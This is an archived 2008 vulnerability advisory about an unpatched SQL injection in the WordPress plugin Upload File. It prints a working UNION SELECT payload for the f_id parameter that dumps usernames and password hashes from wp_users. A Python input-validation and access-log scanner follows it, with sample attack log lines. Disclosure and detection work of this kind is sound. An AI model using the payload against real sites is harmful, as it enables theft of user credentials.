vuln in WordPress plugin Upload File(UP)

2008-05-25T00:00:00
ID SECURITYVULNS:DOC:19907
Type securityvulns
Reporter Securityvulns
Modified 2008-05-25T00:00:00

Description

New Advisory: Wordpress Plugin Upload File(UP) Remote SQL Injection

--------------------Summary----------------
Software: Upload File (WordPress Plugin)
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available
Solution: Not Available
Discovered by: eserg.ru

-----------------Description---------------
1. SQL Injection.

http://localhost/[path]/wp-uploadfile.php?f_id=[SQL]
SQL query: null//union//all//select//concat(user_login,0x3a,user_pass)//from//wp_users/*

--------------PoC/Exploit----------------------
Waiting for developer(s) reply.

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Regards,
Belsec Team
http://eserg.ru
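The advisory reports that the f_id parameter of wp-uploadfile.php reaches an SQL query unsanitized, and the query it shows relies on inline SQL comments (/**/) as whitespace. The following Python is an added example, not part of the advisory and not the plugin's own code: it shows the input contract the plugin should have enforced (f_id treated as a positive integer, an assumption about the parameter's meaning since the advisory does not say) and a small access-log scanner that applies the same contract retroactively, normalizing URL-encoding and inline comments before looking for a UNION ... SELECT. The log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample web-server access-log lines (not taken from the advisory).
# They mimic requests to the wp-uploadfile.php?f_id= endpoint the advisory names,
# including inline-comment (/**/) and URL-encoded spellings of a UNION SELECT.
SAMPLE_LOG = """\
10.0.0.5 - - [25/May/2008:10:00:01 +0000] "GET /blog/wp-uploadfile.php?f_id=12 HTTP/1.1" 200 512
10.0.0.9 - - [25/May/2008:10:00:07 +0000] "GET /blog/wp-uploadfile.php?f_id=null/**/union/**/all/**/select/**/1,2,3/* HTTP/1.1" 200 734
10.0.0.9 - - [25/May/2008:10:00:09 +0000] "GET /blog/wp-uploadfile.php?f_id=null%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 734
10.0.0.7 - - [25/May/2008:10:00:11 +0000] "GET /blog/index.php HTTP/1.1" 200 2048
10.0.0.5 - - [25/May/2008:10:00:15 +0000] "GET /blog/wp-uploadfile.php?f_id=-7 HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SQL_COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
UNION_SELECT_RE = re.compile(r'\bunion\b.*\bselect\b', re.I)


def normalize_param(value: str) -> str:
    """Undo the two evasions the advisory's query relies on: inline SQL
    comments used as whitespace, and (possibly repeated) URL-encoding."""
    # parse_qs already decoded once; a second pass catches double-encoding.
    value = unquote_plus(value)
    value = SQL_COMMENT_RE.sub(' ', value)
    return ' '.join(value.split()).lower()


def is_valid_f_id(value: str) -> bool:
    """Assumed input contract for f_id (a numeric file record id): a positive
    decimal integer. Enforcing this before the query is the mitigation."""
    return value.isdigit() and int(value) > 0


def scan_access_log(log_text: str, endpoint: str = 'wp-uploadfile.php',
                    param: str = 'f_id'):
    """Return (client, raw_value, reason) for every request to the endpoint
    whose f_id violates the integer contract; reason is 'union-select' when
    the normalized value carries a UNION ... SELECT, else 'non-integer f_id'."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        if not parts.path.endswith('/' + endpoint):
            continue
        client = line.split(' ', 1)[0]
        for raw in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            if is_valid_f_id(raw):
                continue
            norm = normalize_param(raw)
            reason = 'union-select' if UNION_SELECT_RE.search(norm) else 'non-integer f_id'
            findings.append((client, raw, reason))
    return findings


if __name__ == '__main__':
    for client, raw, reason in scan_access_log(SAMPLE_LOG):
        print(f'{client}\t{reason}\t{raw}')
```

The scanner flags any f_id that is not a positive integer rather than matching only the exact query in the advisory; the keyword check merely labels the finding, so encoding or comment variants that a signature would miss still surface as 'non-integer f_id'.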